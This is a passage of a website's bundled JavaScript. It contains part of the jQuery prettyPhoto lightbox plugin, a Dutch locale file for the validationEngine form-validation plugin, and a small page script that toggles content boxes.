						toInject = settings.quicktime_markup.replace(/{width}/g,correctSizes['width']).replace(/{height}/g,correctSizes['height']).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,pp_images[set_position]).replace(/{autoplay}/g,settings.autoplay);
					break;
				
					case 'flash':
						correctSizes = _fitToViewport(movie_width,movie_height); // Fit item to viewport
					
						flash_vars = pp_images[set_position];
						flash_vars = flash_vars.substring(pp_images[set_position].indexOf('flashvars') + 10,pp_images[set_position].length);

						filename = pp_images[set_position];
						filename = filename.substring(0,filename.indexOf('?'));
					
						toInject =  settings.flash_markup.replace(/{width}/g,correctSizes['width']).replace(/{height}/g,correctSizes['height']).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,filename+'?'+flash_vars);
					break;
				
					case 'iframe':
						correctSizes = _fitToViewport(movie_width,movie_height); // Fit item to viewport
				
						frame_url = pp_images[set_position];
						frame_url = frame_url.substr(0,frame_url.indexOf('iframe')-1);
				
						toInject = settings.iframe_markup.replace(/{width}/g,correctSizes['width']).replace(/{height}/g,correctSizes['height']).replace(/{path}/g,frame_url);
					break;
					
					case 'custom':
						correctSizes = _fitToViewport(movie_width,movie_height); // Fit item to viewport
					
						toInject = settings.custom_markup;
					break;
				
					case 'inline':
						// to get the item height clone it, apply default width, wrap it in the prettyPhoto containers , then delete
						myClone = $(pp_images[set_position]).clone().css({'width':settings.default_width}).wrapInner('<div id="pp_full_res"><div class="pp_inline clearfix"></div></div>').appendTo($('body'));
						correctSizes = _fitToViewport($(myClone).width(),$(myClone).height());
						$(myClone).remove();
						toInject = settings.inline_markup.replace(/{content}/g,$(pp_images[set_position]).html());
					break;
				};

				if(!imgPreloader){
					$pp_pic_holder.find('#pp_full_res')[0].innerHTML = toInject;
				
					// Show content
					_showContent();
				};
			});

			return false;
		};

	
		/**
		* Change page in the prettyPhoto modal box
		* @param direction {String} Direction of the paging, previous or next.
		*/
		$.prettyPhoto.changePage = function(direction){
			currentGalleryPage = 0;
			
			if(direction == 'previous') {
				set_position--;
				if (set_position < 0){
					set_position = 0;
					return;
				};
			}else if(direction == 'next'){
				set_position++;
				if(set_position > $(pp_images).size()-1) {
					set_position = 0;
				}
			}else{
				set_position=direction;
			};

			if(!doresize) doresize = true; // Allow the resizing of the images
			$('.pp_contract').removeClass('pp_contract').addClass('pp_expand');

			_hideContent(function(){ $.prettyPhoto.open(); });
		};


		/**
		* Change gallery page in the prettyPhoto modal box
		* @param direction {String} Direction of the paging, previous or next.
		*/
		$.prettyPhoto.changeGalleryPage = function(direction){
			if(direction=='next'){
				currentGalleryPage ++;

				if(currentGalleryPage > totalPage){
					currentGalleryPage = 0;
				};
			}else if(direction=='previous'){
				currentGalleryPage --;

				if(currentGalleryPage < 0){
					currentGalleryPage = totalPage;
				};
			}else{
				currentGalleryPage = direction;
			};
			
			// Slide the pages, if we're on the last page, find out how many items we need to slide. To make sure we don't have an empty space.
			itemsToSlide = (currentGalleryPage == totalPage) ? pp_images.length - ((totalPage) * itemsPerPage) : itemsPerPage;
			
			$pp_pic_holder.find('.pp_gallery li').each(function(i){
				$(this).animate({
					'left': (i * itemWidth) - ((itemsToSlide * itemWidth) * currentGalleryPage)
				});
			});
		};


		/**
		* Start the slideshow...
		*/
		$.prettyPhoto.startSlideshow = function(){
			if(typeof pp_slideshow == 'undefined'){
				$pp_pic_holder.find('.pp_play').unbind('click').removeClass('pp_play').addClass('pp_pause').click(function(){
					$.prettyPhoto.stopSlideshow();
					return false;
				});
				pp_slideshow = setInterval($.prettyPhoto.startSlideshow,settings.slideshow);
			}else{
				$.prettyPhoto.changePage('next');	
			};
		}


		/**
		* Stop the slideshow...
		*/
		$.prettyPhoto.stopSlideshow = function(){
			$pp_pic_holder.find('.pp_pause').unbind('click').removeClass('pp_pause').addClass('pp_play').click(function(){
				$.prettyPhoto.startSlideshow();
				return false;
			});
			clearInterval(pp_slideshow);
			pp_slideshow=undefined;
		}


		/**
		* Closes prettyPhoto.
		*/
		$.prettyPhoto.close = function(){

			clearInterval(pp_slideshow);
			
			$pp_pic_holder.stop().find('object,embed').css('visibility','hidden');
			
			$('div.pp_pic_holder,div.ppt,.pp_fade').fadeOut(settings.animation_speed,function(){ $(this).remove(); });
			
			$pp_overlay.fadeOut(settings.animation_speed, function(){
				if($.browser.msie && $.browser.version == 6) $('select').css('visibility','visible'); // To fix the bug with IE select boxes
				
				if(settings.hideflash) $('object,embed').css('visibility','visible'); // Show the flash
				
				$(this).remove(); // No more need for the prettyPhoto markup
				
				$(window).unbind('scroll');
				
				settings.callback();
				
				doresize = true;
				
				pp_open = false;
				
				delete settings;
			});
		};
	
		/**
		* Set the proper sizes on the containers and animate the content in.
		*/
		_showContent = function(){
			$('.pp_loaderIcon').hide();
			
			$ppt.fadeTo(settings.animation_speed,1);

			// Calculate the opened top position of the pic holder
			projectedTop = scroll_pos['scrollTop'] + ((windowHeight/2) - (correctSizes['containerHeight']/2));
			if(projectedTop < 0) projectedTop = 0;

			// Resize the content holder
			$pp_pic_holder.find('.pp_content').animate({'height':correctSizes['contentHeight']},settings.animation_speed);
			
			// Resize picture the holder
			$pp_pic_holder.animate({
				'top': projectedTop,
				'left': (windowWidth/2) - (correctSizes['containerWidth']/2),
				'width': correctSizes['containerWidth']
			},settings.animation_speed,function(){
				$pp_pic_holder.find('.pp_hoverContainer,#fullResImage').height(correctSizes['height']).width(correctSizes['width']);

				$pp_pic_holder.find('.pp_fade').fadeIn(settings.animation_speed); // Fade the new content

				// Show the nav
				if(isSet && _getFileType(pp_images[set_position])=="image") { $pp_pic_holder.find('.pp_hoverContainer').show(); }else{ $pp_pic_holder.find('.pp_hoverContainer').hide(); }
			
				if(correctSizes['resized']) $('a.pp_expand,a.pp_contract').fadeIn(settings.animation_speed); // Fade the resizing link if the image is resized
				
				if(settings.autoplay_slideshow && !pp_slideshow && !pp_open) $.prettyPhoto.startSlideshow();
				
				settings.changepicturecallback(); // Callback!
				
				pp_open = true;
			});
			
			_insert_gallery();
		};
		
		/**
		* Hide the content...DUH!
		*/
		function _hideContent(callback){
			// Fade out the current picture
			$pp_pic_holder.find('#pp_full_res object,#pp_full_res embed').css('visibility','hidden');
			$pp_pic_holder.find('.pp_fade').fadeOut(settings.animation_speed,function(){
				$('.pp_loaderIcon').show();
				
				callback();
			});
		};
	
		/**
		* Check the item position in the gallery array, hide or show the navigation links
		* @param setCount {integer} The total number of items in the set
		*/
		function _checkPosition(setCount){
			// If at the end, hide the next link
			if(set_position == setCount-1) {
				$pp_pic_holder.find('a.pp_next').css('visibility','hidden');
				$pp_pic_holder.find('a.pp_next').addClass('disabled').unbind('click');
			}else{ 
				$pp_pic_holder.find('a.pp_next').css('visibility','visible');
				$pp_pic_holder.find('a.pp_next.disabled').removeClass('disabled').bind('click',function(){
					$.prettyPhoto.changePage('next');
					return false;
				});
			};
		
			// If at the beginning, hide the previous link
			if(set_position == 0) {
				$pp_pic_holder
					.find('a.pp_previous')
					.css('visibility','hidden')
					.addClass('disabled')
					.unbind('click');
			}else{
				$pp_pic_holder.find('a.pp_previous.disabled')
					.css('visibility','visible')
					.removeClass('disabled')
					.bind('click',function(){
						$.prettyPhoto.changePage('previous');
						return false;
					});
			};
			
			(setCount > 1) ? $('.pp_nav').show() : $('.pp_nav').hide(); // Hide the bottom nav if it's not a set.
		};
	
		/**
		* Resize the item dimensions if it's bigger than the viewport
		* @param width {integer} Width of the item to be opened
		* @param height {integer} Height of the item to be opened
		* @return An array containin the "fitted" dimensions
		*/
		function _fitToViewport(width,height){
			resized = false;

			_getDimensions(width,height);
			
			// Define them in case there's no resize needed
			imageWidth = width, imageHeight = height;

			if( ((pp_containerWidth > windowWidth) || (pp_containerHeight > windowHeight)) && doresize && settings.allow_resize && !percentBased) {
				resized = true, fitting = false;
			
				while (!fitting){
					if((pp_containerWidth > windowWidth)){
						imageWidth = (windowWidth - 200);
						imageHeight = (height/width) * imageWidth;
					}else if((pp_containerHeight > windowHeight)){
						imageHeight = (windowHeight - 200);
						imageWidth = (width/height) * imageHeight;
					}else{
						fitting = true;
					};

					pp_containerHeight = imageHeight, pp_containerWidth = imageWidth;
				};
			
				_getDimensions(imageWidth,imageHeight);
			};

			return {
				width:Math.floor(imageWidth),
				height:Math.floor(imageHeight),
				containerHeight:Math.floor(pp_containerHeight),
				containerWidth:Math.floor(pp_containerWidth) + 40, // 40 behind the side padding
				contentHeight:Math.floor(pp_contentHeight),
				contentWidth:Math.floor(pp_contentWidth),
				resized:resized
			};
		};
		
		/**
		* Get the containers dimensions according to the item size
		* @param width {integer} Width of the item to be opened
		* @param height {integer} Height of the item to be opened
		*/
		function _getDimensions(width,height){
			width = parseFloat(width);
			height = parseFloat(height);
			
			// Get the details height, to do so, I need to clone it since it's invisible
			$pp_details = $pp_pic_holder.find('.pp_details');
			$pp_details.width(width);
			detailsHeight = parseFloat($pp_details.css('marginTop')) + parseFloat($pp_details.css('marginBottom'));
			$pp_details = $pp_details.clone().appendTo($('body')).css({
				'position':'absolute',
				'top':-10000
			});
			detailsHeight += $pp_details.height();
			detailsHeight = (detailsHeight <= 34) ? 36 : detailsHeight; // Min-height for the details
			if($.browser.msie && $.browser.version==7) detailsHeight+=8;
			$pp_details.remove();
			
			// Get the container size, to resize the holder to the right dimensions
			pp_contentHeight = height + detailsHeight;
			pp_contentWidth = width;
			pp_containerHeight = pp_contentHeight + $ppt.height() + $pp_pic_holder.find('.pp_top').height() + $pp_pic_holder.find('.pp_bottom').height();
			pp_containerWidth = width;
		}
	
		function _getFileType(itemSrc){
			if (itemSrc.match(/youtube\.com\/watch/i)) {
				return 'youtube';
			}else if (itemSrc.match(/vimeo\.com/i)) {
				return 'vimeo';
			}else if(itemSrc.indexOf('.mov') != -1){ 
				return 'quicktime';
			}else if(itemSrc.indexOf('.swf') != -1){
				return 'flash';
			}else if(itemSrc.indexOf('iframe') != -1){
				return 'iframe';
			}else if(itemSrc.indexOf('custom') != -1){
				return 'custom';
			}else if(itemSrc.substr(0,1) == '#'){
				return 'inline';
			}else{
				return 'image';
			};
		};
	
		function _center_overlay(){
			if(doresize && typeof $pp_pic_holder != 'undefined') {
				scroll_pos = _get_scroll();
				
				titleHeight = $ppt.height(), contentHeight = $pp_pic_holder.height(), contentwidth = $pp_pic_holder.width();
				
				projectedTop = (windowHeight/2) + scroll_pos['scrollTop'] - (contentHeight/2);
				
				$pp_pic_holder.css({
					'top': projectedTop,
					'left': (windowWidth/2) + scroll_pos['scrollLeft'] - (contentwidth/2)
				});
			};
		};
	
		function _get_scroll(){
			if (self.pageYOffset) {
				return {scrollTop:self.pageYOffset,scrollLeft:self.pageXOffset};
			} else if (document.documentElement && document.documentElement.scrollTop) { // Explorer 6 Strict
				return {scrollTop:document.documentElement.scrollTop,scrollLeft:document.documentElement.scrollLeft};
			} else if (document.body) {// all other Explorers
				return {scrollTop:document.body.scrollTop,scrollLeft:document.body.scrollLeft};
			};
		};
	
		function _resize_overlay() {
			windowHeight = $(window).height(), windowWidth = $(window).width();
			
			if(typeof $pp_overlay != "undefined") $pp_overlay.height($(document).height());
		};
	
		function _insert_gallery(){
			if(isSet && settings.overlay_gallery && _getFileType(pp_images[set_position])=="image") {
				itemWidth = 52+5; // 52 beign the thumb width, 5 being the right margin.
				navWidth = (settings.theme == "facebook") ? 58 : 38; // Define the arrow width depending on the theme
				
				itemsPerPage = Math.floor((correctSizes['containerWidth'] - 100 - navWidth) / itemWidth);
				itemsPerPage = (itemsPerPage < pp_images.length) ? itemsPerPage : pp_images.length;
				totalPage = Math.ceil(pp_images.length / itemsPerPage) - 1;

				// Hide the nav in the case there's no need for links
				if(totalPage == 0){
					navWidth = 0; // No nav means no width!
					$pp_pic_holder.find('.pp_gallery .pp_arrow_next,.pp_gallery .pp_arrow_previous').hide();
				}else{
					$pp_pic_holder.find('.pp_gallery .pp_arrow_next,.pp_gallery .pp_arrow_previous').show();
				};

				galleryWidth = itemsPerPage * itemWidth + navWidth;
				
				// Set the proper width to the gallery items
				$pp_pic_holder.find('.pp_gallery')
					.width(galleryWidth)
					.css('margin-left',-(galleryWidth/2));
					
				$pp_pic_holder
					.find('.pp_gallery ul')
					.width(itemsPerPage * itemWidth)
					.find('li.selected')
					.removeClass('selected');
				
				goToPage = (Math.floor(set_position/itemsPerPage) <= totalPage) ? Math.floor(set_position/itemsPerPage) : totalPage;
				
				
				if(itemsPerPage) {
					$pp_pic_holder.find('.pp_gallery').hide().show().removeClass('disabled');
				}else{
					$pp_pic_holder.find('.pp_gallery').hide().addClass('disabled');
				}
				
				$.prettyPhoto.changeGalleryPage(goToPage);
				
				$pp_pic_holder
					.find('.pp_gallery ul li:eq('+set_position+')')
					.addClass('selected');
			}else{
				$pp_pic_holder.find('.pp_content').unbind('mouseenter mouseleave');
				$pp_pic_holder.find('.pp_gallery').hide();
			}
		}
	
		function _buildOverlay(caller){
			// Find out if the picture is part of a set
			theRel = $(caller).attr('rel');
			galleryRegExp = /\[(?:.*)\]/;
			isSet = (galleryRegExp.exec(theRel)) ? true : false;
			
			// Put the SRCs, TITLEs, ALTs into an array.
			pp_images = (isSet) ? jQuery.map(matchedObjects, function(n, i){ if($(n).attr('rel').indexOf(theRel) != -1) return $(n).attr('href'); }) : $.makeArray($(caller).attr('href'));
			pp_titles = (isSet) ? jQuery.map(matchedObjects, function(n, i){ if($(n).attr('rel').indexOf(theRel) != -1) return ($(n).find('img').attr('alt')) ? $(n).find('img').attr('alt') : ""; }) : $.makeArray($(caller).find('img').attr('alt'));
			pp_descriptions = (isSet) ? jQuery.map(matchedObjects, function(n, i){ if($(n).attr('rel').indexOf(theRel) != -1) return ($(n).attr('title')) ? $(n).attr('title') : ""; }) : $.makeArray($(caller).attr('title'));
			
			$('body').append(settings.markup); // Inject the markup
			
			$pp_pic_holder = $('.pp_pic_holder') , $ppt = $('.ppt'), $pp_overlay = $('div.pp_overlay'); // Set my global selectors
			
			// Inject the inline gallery!
			if(isSet && settings.overlay_gallery) {
				currentGalleryPage = 0;
				toInject = "";
				for (var i=0; i < pp_images.length; i++) {
					var regex = new RegExp("(.*?)\.(jpg|jpeg|png|gif)$");
					var results = regex.exec( pp_images[i] );
					if(!results){
						classname = 'default';
					}else{
						classname = '';
					}
					toInject += "<li class='"+classname+"'><a href='#'><img src='" + pp_images[i] + "' width='50' alt='' /></a></li>";
				};
				
				toInject = settings.gallery_markup.replace(/{gallery}/g,toInject);
				
				$pp_pic_holder.find('#pp_full_res').after(toInject);
				
				$pp_pic_holder.find('.pp_gallery .pp_arrow_next').click(function(){
					$.prettyPhoto.changeGalleryPage('next');
					$.prettyPhoto.stopSlideshow();
					return false;
				});
				
				$pp_pic_holder.find('.pp_gallery .pp_arrow_previous').click(function(){
					$.prettyPhoto.changeGalleryPage('previous');
					$.prettyPhoto.stopSlideshow();
					return false;
				});
				
				$pp_pic_holder.find('.pp_content').hover(
					function(){
						$pp_pic_holder.find('.pp_gallery:not(.disabled)').fadeIn();
					},
					function(){
						$pp_pic_holder.find('.pp_gallery:not(.disabled)').fadeOut();
					});

				itemWidth = 52+5; // 52 beign the thumb width, 5 being the right margin.
				$pp_pic_holder.find('.pp_gallery ul li').each(function(i){
					$(this).css({
						'position':'absolute',
						'left': i * itemWidth
					});

					$(this).find('a').unbind('click').click(function(){
						$.prettyPhoto.changePage(i);
						$.prettyPhoto.stopSlideshow();
						return false;
					});
				});
			};
			
			
			// Inject the play/pause if it's a slideshow
			if(settings.slideshow){
				$pp_pic_holder.find('.pp_nav').prepend('<a href="#" class="pp_play">Play</a>')
				$pp_pic_holder.find('.pp_nav .pp_play').click(function(){
					$.prettyPhoto.startSlideshow();
					return false;
				});
			}
			
			$pp_pic_holder.attr('class','pp_pic_holder ' + settings.theme); // Set the proper theme
			
			$pp_overlay
				.css({
					'opacity':0,
					'height':$(document).height(),
					'width':$(document).width()
					})
				.bind('click',function(){
					if(!settings.modal) $.prettyPhoto.close();
				});

			$('a.pp_close').bind('click',function(){ $.prettyPhoto.close(); return false; });

			$('a.pp_expand').bind('click',function(e){
				// Expand the image
				if($(this).hasClass('pp_expand')){
					$(this).removeClass('pp_expand').addClass('pp_contract');
					doresize = false;
				}else{
					$(this).removeClass('pp_contract').addClass('pp_expand');
					doresize = true;
				};
			
				_hideContent(function(){ $.prettyPhoto.open(); });
		
				return false;
			});
		
			$pp_pic_holder.find('.pp_previous, .pp_nav .pp_arrow_previous').bind('click',function(){
				$.prettyPhoto.changePage('previous');
				$.prettyPhoto.stopSlideshow();
				return false;
			});
		
			$pp_pic_holder.find('.pp_next, .pp_nav .pp_arrow_next').bind('click',function(){
				$.prettyPhoto.changePage('next');
				$.prettyPhoto.stopSlideshow();
				return false;
			});
			
			_center_overlay(); // Center it
		};
		
		return this.unbind('click').click($.prettyPhoto.initialize); // Return the jQuery object for chaining. The unbind method is used to avoid click conflict when the plugin is called more than once
	};
	
	function grab_param(name,url){
	  name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
	  var regexS = "[\\?&]"+name+"=([^&#]*)";
	  var regex = new RegExp( regexS );
	  var results = regex.exec( url );
	  return ( results == null ) ? "" : results[1];
	}
	
})(jQuery);
(function($){
	$.fn.validationEngineLanguage = function(){
	};
	$.validationEngineLanguage = {
	    newLang: function(){
	        $.validationEngineLanguage.allRules = {
	            "required": { // Add your regex rules here, you can take telephone as an example
	                "regex": "geen",
	                "alertText": "* Dit veld is verplicht",
	                "alertTextCheckboxMultiple": "* Selecteer a.u.b. een optie",
	                "alertTextCheckboxe": "* Dit selectievakje is verplicht"
	            },
	            "minSize": {
	                "regex": "none",
	                "alertText": "* Minimaal ",
	                "alertText2": " karakters toegestaan"
	            },
	            "maxSize": {
	                "regex": "none",
	                "alertText": "* Maximaal ",
	                "alertText2": " karakters toegestaan"
	            },
	            "min": {
	                "regex": "none",
	                "alertText": "* Minimale waarde is "
	            },
	            "max": {
	                "regex": "none",
	                "alertText": "* Maximale waarde is "
	            },
	            "past": {
	                "regex": "none",
	                "alertText": "* Datum voorafgaand aan "
	            },
	            "future": {
	                "regex": "none",
	                "alertText": "* Datum na "
	            },
	            "maxCheckbox": {
	                "regex": "none",
	                "alertText": "* Toegestane aantal vinkjes overschreden"
	            },
	            "minCheckbox": {
	                "regex": "none",
	                "alertText": "* Selecteer a.u.b. ",
	                "alertText2": " opties"
	            },
	            "equals": {
	                "regex": "none",
	                "alertText": "* Velden komen niet overeen"
	            },
	            "phone": {
	                // credit: jquery.h5validate.js / orefalo
	                "regex": /^([\+][0-9]{1,3}[ \.\-])?([\(]{1}[0-9]{2,6}[\)])?([0-9 \.\-\/]{3,20})((x|ext|extension)[ ]?[0-9]{1,4})?$/,
	                "alertText": "* Ongeldig telefoonnummer"
	            },
	            "email": {
	                // Shamelessly lifted from Scott Gonzalez via the Bassistance Validation plugin http://projects.scottsplayground.com/email_address_validation/
	                "regex": /^((([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+(\.([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+)*)|((\x22)((((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(([\x01-\x08\x0b\x0c\x0e-\x1f\x7f]|\x21|[\x23-\x5b]|[\x5d-\x7e]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(\\([\x01-\x09\x0b\x0c\x0d-\x7f]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]))))*(((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(\x22)))@((([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.)+(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.?$/i,
	                "alertText": "* Ongeldig e-mailadres"
	            },
	            "integer": {
	                "regex": /^[\-\+]?\d+$/,
	                "alertText": "* Ongeldig geheel getal"
	            },
	            "number": {
	                // Number, including positive, negative, and floating decimal. credit: orefalo
	                "regex": /^[\-\+]?(([0-9]+)([\.,]([0-9]+))?|([\.,]([0-9]+))?)$/,
	                "alertText": "* Ongeldig drijvende comma getal"
	            },
	            "date": {
	                "regex": /^\d{4}[\/\-](0?[1-9]|1[012])[\/\-](0?[1-9]|[12][0-9]|3[01])$/,
	                "alertText": "* Ongeldige datum, formaat moet JJJJ-MM-DD zijn"
	            },
	            "ipv4": {
	            	"regex": /^((([01]?[0-9]{1,2})|(2[0-4][0-9])|(25[0-5]))[.]){3}(([0-1]?[0-9]{1,2})|(2[0-4][0-9])|(25[0-5]))$/,
	                "alertText": "* Ongeldig IP-adres"
	            },
	            "url": {
                    "regex": /^(https?|ftp):\/\/(((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:)*@)?(((\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5]))|((([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.)+(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.?)(:\d*)?)(\/((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)+(\/(([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)*)*)?)?(\?((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)|[\uE000-\uF8FF]|\/|\?)*)?(\#((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)|\/|\?)*)?$/i,
	                "alertText": "* Ongeldige URL"
	            },
	            "onlyNumberSp": {
	                "regex": /^[0-9\ ]+$/,
	                "alertText": "* Alleen cijfers"
	            },
	            "onlyLetterSp": {
	                "regex": /^[a-zA-Z\ \']+$/,
	                "alertText": "* Alleen leestekens"
	            },
	            "onlyLetterNumber": {
	                "regex": /^[0-9a-zA-Z]+$/,
	                "alertText": "* Geen vreemde tekens toegestaan"
	            },
	            // --- CUSTOM RULES -- Those are specific to the demos, they can be removed or changed to your likings
	            "ajaxUserCall": {
	                "url": "ajaxValidateFieldUser",
	                // you may want to pass extra data on the ajax call
	                "extraData": "name=eric",
	                "alertText": "* Deze gebruiker bestaat al",
	                "alertTextLoad": "* Bezig met valideren, even geduld aub"
	            },
	            "ajaxNameCall": {
	                // remote json service location
	                "url": "ajaxValidateFieldName",
	                // error
	                "alertText": "* Deze naam bestaat al",
	                // if you provide an "alertTextOk", it will show as a green prompt when the field validates
	                "alertTextOk": "* Deze naam is beschikbaar",
	                // speaks by itself
	                "alertTextLoad": "* Bezig met valideren, even geduld aub"
	            },
	            "validate2fields": {
	                "alertText": "* Voer aub HELLO in"
	            }
	        };

	    }
	};
	$.validationEngineLanguage.newLang();
})(jQuery);



$(document).ready(function(){

	
	$(".biggerlink").biggerlink();
	
	$("a[rel^='prettyPhoto']").prettyPhoto();
	
	
	$(".musicBox h3 span a").click( function() {
		
		var ul = $(this).parent().parent().parent().find('ul');
		
		if( ul.css('display') == "block" )
		{
			$(this).parent().removeClass('active');
			ul.fadeOut("slow");
		}
		else
		{
			$(this).parent().addClass('active');
			ul.fadeIn("slow");
		}
	});
	
	$(".headlineBox a.switch").click( function() {
		
		var div = $(this).parent().parent().find('div');
		
		if( div.css('display') == "block" )
		{
			$(this).removeClass('active');
			div.fadeOut("slow");
		}
		else
		{
			$(this).addClass('active');
			div.fadeIn("slow");
		}
	});

	
});
